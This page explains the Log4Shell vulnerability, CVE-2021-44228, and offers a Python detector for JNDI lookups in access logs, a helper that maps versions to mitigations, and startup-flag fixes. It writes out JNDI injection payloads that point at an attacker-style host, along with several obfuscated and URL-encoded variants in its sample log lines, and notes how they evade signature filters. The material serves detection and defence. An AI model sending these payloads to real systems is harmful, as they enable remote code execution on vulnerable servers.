The attack surface for the Log4j vulnerability (CVE-2021-44228, "Log4Shell") is very large: any Java application or product that logs attacker-controlled input through an affected log4j-core is a candidate.
Check out https://github.com/YfryTchsGD/Log4jAttackSurface for a collection of affected products and services.
Log4j 2 is the open source Apache logging framework used by a huge number of Java applications. In the affected versions (2.0-beta9 through 2.14.1) the framework evaluates ${...} lookup expressions that appear inside a logged message, and one of the available lookups is the Java Naming and Directory Interface (JNDI). So an attacker only has to send a request that contains, in any field the application logs (a URL parameter, the User-Agent or any other header), a string such as
${jndi:ldap://malicious-domain.com/a}
where malicious-domain.com is a host the attacker controls. When Log4j formats that message it performs the JNDI lookup, so the application's own JVM connects to the attacker's LDAP server. The LDAP response can point at a remote Java class, which the JVM downloads and loads, giving the attacker arbitrary code execution inside the application process (log4j is a library, so there is no separate logging server; the compromised process is the application itself).
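The payload above rarely shows up in logs in its plain form; in-the-wild probes hide the jndi keyword behind nested lookups such as ${lower:j} or ${::-j} (the ${name:-default} syntax with an unresolvable name) and URL-encode the whole thing. The following detector, an added example that is not part of the original page and not code from the Log4j project, decodes a log line, collapses those nested lookups the way Log4j would, and then reports the JNDI scheme and target host. The log lines are constructed for the example; the function names are the example's own.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no nested "${" or "}" inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A de-obfuscated JNDI lookup, e.g. ${jndi:ldap://host:1389/a} or ${jndi:rmi://host/x}.
# Group 1 is the JNDI scheme, group 2 the target host (port and path excluded).
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:\s*/*([^/:}\s]+)", re.IGNORECASE
)


def _resolve_one(m):
    """Resolve one innermost lookup the way Log4j 2 would, except for jndi: itself."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return m.group(0)                    # keep it: this is what we are hunting for
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()  # ${lower:J} -> j
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()  # ${upper:j} -> J
    if ":-" in body:
        # ${name:-default}: attackers pick a name that never resolves so the default wins.
        return body.rsplit(":-", 1)[1]       # ${::-j} -> j, ${env:NOPE:-j} -> j
    # Any other lookup (${date}, ${sys:x}, ...): keep the body text so the scan can
    # continue. This is an approximation; Log4j itself would resolve or leave it.
    return body


def normalize(text, max_rounds=32):
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        new = INNER_LOOKUP.sub(_resolve_one, text)
        if new == text:
            return new
        text = new
    return text


def find_jndi(line):
    """Return [(scheme, host), ...] for every JNDI lookup hidden in one log line."""
    text = normalize(unquote(line))          # decode %24%7Bjndi... before collapsing
    return [(m.group(1).lower(), m.group(2)) for m in JNDI_LOOKUP.finditer(text)]


def scan(lines):
    """Return [(line_index, hits), ...] for the lines that carry a JNDI lookup."""
    return [(i, hits) for i, line in enumerate(lines) if (hits := find_jndi(line))]


# Constructed sample access-log lines (not real traffic): one benign request, four
# probe variants, and one benign line that merely contains a harmless lookup.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:01:07 +0000] "GET / HTTP/1.1" 200 1234 "-" "${jndi:ldap://malicious-domain.com/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:09 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://malicious-domain.com/b} HTTP/1.1" 400 0 "-" "-"',
    '10.0.0.9 - - [10/Dec/2021:13:01:11 +0000] "GET / HTTP/1.1" 200 0 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://malicious-domain.com/c}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:14 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fmalicious-domain.com%2Fd%7D HTTP/1.1" 200 0 "-" "-"',
    '10.0.0.7 - - [10/Dec/2021:13:01:20 +0000] "GET /docs/${date} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOG):
        for scheme, host in hits:
            print(f"line {index}: JNDI lookup via {scheme} to {host}")
```

Run it over a real access log by replacing SAMPLE_LOG with the file's lines. The decode-then-collapse order matters: a single regex for "${jndi:" misses every one of the three obfuscated lines above, which is exactly why early signature-only WAF rules were bypassed.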
How to fix
The quickest mitigation is to turn off log4j's processing of lookups inside log messages.
Since log4j 2.10 there is a system property that does exactly that:
-Dlog4j2.formatMsgNoLookups=true
Keep in mind that this is a stopgap, not the fix: the property is not recognised by versions older than 2.10, it does not close every path to the JNDI lookup (see CVE-2021-45046), and the real fix is to upgrade log4j-core to 2.17.1 or later. Where an upgrade cannot happen immediately, the flag (or, on versions older than 2.10, deleting the JndiLookup class from the log4j-core jar) buys time. In many Java based web apps the JVM options are taken from environment variables, so the option can simply be added to the startup script of the app.
For example:
EXTRA_JAVA_OPTS="-Dlog4j2.formatMsgNoLookups=true"
or:
export JAVA_OPTS="-Dlog4j2.formatMsgNoLookups=true"
or, on Windows based apps:
set EXTRA_JAVA_OPTS=-Dlog4j2.formatMsgNoLookups=true
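Before rolling the flag out it is worth checking which mitigation actually applies to the log4j-core version a given app ships, since the flag does nothing on 2.0-2.9 and is already superseded on 2.15 and later. The helper below is an added example, not code from the original page or from the Log4j project: it maps a log4j-core version string to the applicable action for CVE-2021-44228 and rewrites a JAVA_OPTS string so the flag is present exactly once, replacing any earlier "=false". The version boundaries are Apache's published ones; the function and return-value names are the example's own, and the 2.3.x / 2.12.x cases are the Java 6 / Java 7 backport branches.

```python
import re

# Class to delete from log4j-core on versions too old to honour the flag.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
NO_LOOKUPS_FLAG = "-Dlog4j2.formatMsgNoLookups=true"
FLAG_PREFIX = "-Dlog4j2.formatMsgNoLookups="

VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z0-9.]+))?")


def parse_version(text):
    """'2.14.1' -> ((2, 14, 1), None); '2.0-beta9' -> ((2, 0, 0), 'beta9')."""
    m = VERSION_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {text!r}")
    return (int(m[1]), int(m[2]), int(m[3] or 0)), m[4]


def mitigation_for(version):
    """Action for CVE-2021-44228 given a log4j-core version string."""
    nums, _pre = parse_version(version)
    if nums[0] < 2:
        return "unaffected"               # log4j 1.x does not evaluate message lookups
    if nums >= (2, 17, 1):
        return "fixed"
    if (2, 3, 1) <= nums < (2, 4, 0) or (2, 12, 2) <= nums < (2, 13, 0):
        return "fixed"                    # Java 6 / Java 7 backport branches
    if nums >= (2, 15, 0):
        return "upgrade"                  # message lookups already off/removed; take 2.17.1+
    if nums >= (2, 10, 0):
        return "set-formatMsgNoLookups"   # the flag exists and works as a stopgap
    # 2.0-beta9 .. 2.9.x (all 2.0 pre-releases treated as vulnerable, conservatively):
    # the flag is ignored, so remove JNDI_LOOKUP_CLASS from the jar until upgraded.
    return "remove-jndilookup-class"


def with_no_lookups(java_opts):
    """Return java_opts with the flag set to true exactly once."""
    kept = [o for o in java_opts.split() if not o.startswith(FLAG_PREFIX)]
    return " ".join(kept + [NO_LOOKUPS_FLAG])


if __name__ == "__main__":
    for v in ["1.2.17", "2.0-beta9", "2.9.1", "2.14.1", "2.15.0", "2.17.1"]:
        print(f"log4j-core {v:>9}: {mitigation_for(v)}")
    print(with_no_lookups("-Xmx2g -Dlog4j2.formatMsgNoLookups=false"))
```

Feed it the version from the jar file name or from the Implementation-Version entry in the jar's MANIFEST.MF. A result of "set-formatMsgNoLookups" means the startup-script change above is worth doing today; every other non-"fixed" result means the flag alone will not help.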